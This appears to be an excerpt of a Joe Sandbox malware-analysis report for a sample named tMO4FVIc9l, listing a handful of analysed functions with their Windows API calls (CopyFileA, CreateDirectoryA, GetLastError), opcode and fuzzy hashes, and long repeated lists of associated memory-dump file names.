Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ErrorLast
String ID: \*.*
API String ID: 2454169095-1173974218
Opcode ID: df4abf59d4ac9b4746c5ac838a2c26a20828a95e2c20eecf3e4e726238ac2553
Instruction ID: ab5a4fbe3da0bb018020734767029dfb8e9e8ae6388323a69533537e3b256f6e
Opcode Fuzzy Hash: df4abf59d4ac9b4746c5ac838a2c26a20828a95e2c20eecf3e4e726238ac2553
Instruction Fuzzy Hash: E6D101B0C04249CFDB14DFA8C9457EDBBB4FF56304F208259E454AB2D2D7759A88CB92

Function 00A666F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(?,?,00000000,009C2BFA,009C578B,?,06859C8B,009B3F3E,F9288CB2,?,00A28108,?,009B98E9,1E234789,44205A07), ref: 008F6D25
GetLastError.KERNEL32(?,06859C8B,009B3F3E,F9288CB2,?,00A28108,?,009B98E9,1E234789,44205A07), ref: 008F6D33

Strings

3, xrefs: 00A6671E

Memory Dump Source

Source File: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: 3
API String ID: 374144340-1842515611
Opcode ID: 85f1369ccc0f6863937ec9a762fd54220472d67f9a29f096dda931137f3075cb
Instruction ID: 7b2c592412788183cd5c08efd42ef79cd681a13de7344ecab206c6a58e0e5533
Opcode Fuzzy Hash: 85f1369ccc0f6863937ec9a762fd54220472d67f9a29f096dda931137f3075cb
Instruction Fuzzy Hash: A3213532E0C348EBDB119B69AC817DCFBA4FF85760F5009AEF95593240DB76A811CB41

Function 008F6BA0 Relevance: 4.7, APIs: 3, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,00000000), ref: 008F6BD3
CopyFileA.KERNEL32(?,?,00000000,009C2BFA,009C578B,?,06859C8B,009B3F3E,F9288CB2,?,00A28108,?,009B98E9,1E234789,44205A07), ref: 008F6D25
GetLastError.KERNEL32(?,06859C8B,009B3F3E,F9288CB2,?,00A28108,?,009B98E9,1E234789,44205A07), ref: 008F6D33

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: ErrorLast$CopyFile
String ID:
API String ID: 936320341-0
Opcode ID: 056d7ed57dde67e0134b2212fa3de8e21e04cb6180a4e56f93d5e0e311f57f6e
Instruction ID: 530c29330648cda20912d053120deae62111ac06434bc6e0beea53a387ad8f12
Opcode Fuzzy Hash: 056d7ed57dde67e0134b2212fa3de8e21e04cb6180a4e56f93d5e0e311f57f6e
Instruction Fuzzy Hash: F551BE72D0121DABDB21DBA4CD41BEEBBB8FF44320F104265E654F7281E775AE058BA1

Function 00906CA0 Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000006,00000005,00000005), ref: 00906D07
std::_Throw_Cpp_error.LIBCPMT ref: 00906D4F
std::_Throw_Cpp_error.LIBCPMT ref: 00906D60

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ErrorLast
String ID:
API String ID: 2454169095-0
Opcode ID: f3a9068093bee229e716655d09ce12d0afa112b82cfe224b895f35fb0b52e58c
Instruction ID: 13f05bcbb948850e8a1ce8639c7d0d084c08a1eda344559abb4cfb6ad0af100c
Opcode Fuzzy Hash: f3a9068093bee229e716655d09ce12d0afa112b82cfe224b895f35fb0b52e58c
Instruction Fuzzy Hash: E3117AB1A042469FCB305F6C6C457A93BACFB63B34F204315E9359B2D0DF314825C692

Function 00906C10 Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(?,00000000,00000005), ref: 00906C55
std::_Throw_Cpp_error.LIBCPMT ref: 00906C84
std::_Throw_Cpp_error.LIBCPMT ref: 00906C95

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CreateDirectory
String ID:
API String ID: 2715195259-0
Opcode ID: d09a06d3d16b505267c6e3ecac855b342d40d4e9adb37ba58b20ec45c8c8c96e
Instruction ID: 26b9a712a28c5d69049713a0b022a202351f717f6e9bf07908adbebef7b555b2
Opcode Fuzzy Hash: d09a06d3d16b505267c6e3ecac855b342d40d4e9adb37ba58b20ec45c8c8c96e
Instruction Fuzzy Hash: 00F0D1B2905614EFD3209F5CAC06B6A77E8FB47B35F100369F9359A3D0EB71091186E2

Function 008F6790 Relevance: 3.3, APIs: 2, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008F6BA0: GetLastError.KERNEL32(?,00000000), ref: 008F6BD3

std::_Throw_Cpp_error.LIBCPMT ref: 008F6B84

Part of subcall function 00852534: __EH_prolog3.LIBCMT ref: 00852570

std::_Throw_Cpp_error.LIBCPMT ref: 008F6B95

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
